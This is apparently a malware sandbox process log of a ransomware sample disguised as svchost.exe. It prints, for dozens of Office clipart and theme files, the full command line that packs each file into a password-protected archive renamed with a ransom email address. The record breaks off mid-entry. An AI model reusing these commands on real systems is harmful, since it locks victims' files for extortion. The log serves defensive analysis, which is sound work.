- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02398U.BMP(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02398U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2760
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02412K.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02412K.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2892
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02417U.BMP(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02417U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2788
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02466U.BMP(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02466U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2864
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02470U.BMP(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02470U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2088
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02503U.BMP(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02503U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2680
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02567J.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02567J.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:580
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02736U.BMP(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02736U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2536
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02738U.BMP(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02738U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2768
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02740U.BMP(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02740U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1376
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02742U.BMP(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02742U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2916
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02746U.BMP(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02746U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1172
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02748U.BMP(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02748U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2932
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02749U.BMP(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02749U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1232
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02750U.BMP(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02750U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2616
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02752U.BMP(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02752U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:764
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02753U.BMP(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02753U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:956
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02754U.BMP(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02754U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2120
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02755U.BMP(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02755U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2152
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02756U.BMP(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02756U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1696
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02757U.BMP(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02757U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1936
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02758U.BMP(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02758U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:704
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02759J.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02759J.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:3000
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02810J.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02810J.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2940
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02829J.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02829J.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:820
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02897J.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02897J.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1868
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03011U.BMP(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03011U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:960
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03012U.BMP(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03012U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2984
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03041I.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03041I.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2928
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03143I.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03143I.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2400
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03205I.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03205I.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1940
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03224I.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03224I.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2020
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03379I.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03379I.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1144
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03380I.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03380I.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1860
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03425I.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03425I.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1196
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Adjacency.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Adjacency.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2344
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Angles.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Angles.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1072
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Apex.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Apex.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2476
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Apothecary.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Apothecary.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1740
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Aspect.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Aspect.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2404
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Austin.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Austin.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2240
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Black Tie.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Black Tie.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2724
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Civic.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Civic.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2624
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Clarity.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Clarity.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2472
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Composite.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Composite.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2784
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Concourse.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Concourse.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2736
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Couture.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Couture.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2140
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Elemental.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Elemental.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2504
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Equity.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Equity.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2592
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Essential.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Essential.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:348
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Executive.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Executive.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2792
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Flow.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Flow.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1528
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Foundry.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Foundry.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:968
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Grayscale.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Grayscale.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2704
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Grid.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Grid.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1348
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Hardcover.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Hardcover.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2776
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Horizon.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Horizon.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2336
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Median.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Median.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1388
- C:\ProgramData\msvkp\svchost.exe
